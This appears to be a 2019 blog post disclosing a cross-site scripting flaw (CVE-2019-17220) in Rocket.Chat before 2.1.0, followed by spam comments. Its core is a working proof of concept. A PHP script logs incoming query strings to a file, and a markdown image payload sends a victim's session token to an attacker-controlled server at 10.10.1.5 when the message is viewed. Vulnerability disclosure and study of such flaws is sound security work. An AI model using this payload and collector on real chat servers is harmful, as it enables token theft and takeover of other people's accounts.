Wednesday, October 2, 2019

Rocket.Chat Cross Site Scripting CVE-2019-17220

Rocket.Chat versions prior to 2.1.0 suffer from a cross-site scripting vulnerability.

As I found out, the service has a security problem that will lead to the disclosure of user information.

Packet Storm
Mitre CVE
NIST
Exploit-DB



 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server 


<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send payload with your web server url


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. Token will be written in logs.txt when target seen your message.

10 comments:

  1. Really impressed! Everything is very open and very clear clarification of issues. It contains truly facts. Your website is very valuable. Thanks for sharing. 프리서버

    ReplyDelete
  2. A fundamental hotspot for the group of onlookers that makes the peruser stride by step.
    IT support Phoenix

    ReplyDelete
  3. I am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work. free chat room

    ReplyDelete
  4. Excellent article. Very interesting to read. I really love to read such a nice article. Thanks! keep rocking. 결혼정보업체

    ReplyDelete
  5. At that point lauding the characteristics of his crowd, and announcing "Effortlessness and Peace, of God the Father and of our Lord Jesus Christ. tool reviews

    ReplyDelete
  6. Ich habe auch ein paar nützliche Informationen zum Thema Wallbox gefunden. Wallbox

    ReplyDelete
  7. Fabulous post, you have denoted out some fantastic points, I likewise think this s a very wonderful website. I will visit again for more quality contents and also, recommend this site to all. Thanks. hkeasychat

    ReplyDelete
  8. How to set up Echo Plus Setup and Download Alexa App?

    Alexa, well renowned advanced technology that recognizes human voice easily and functions on cloud-based networking system. In this blog we will tell you to set up Echo plus setup and Download Alexa App. You must firstly link to download Alexa App on the smartphone/tablet. Well, we are happy to say that Alexa is available on Android/IOS devices. One need to login Amazon Alexa with your Amazon ID and Password and set up Alexa. Well, Alexa is available on Android/IOS devices. One need to login Amazon with your ID and Password and set up for Alexa.
    • Tap to go to settings and click on Setup to get Echo App Setup Download link.
    • Later, after you have done with this method select type of echo device you are going to link.
    • It is recommended if you have more than two device just turn off microphones of other devices for better interaction.

    ReplyDelete
  9. This is really nice post, I love this content also visit Free Chattting Online Malaysia. Thanks for sharing.

    ReplyDelete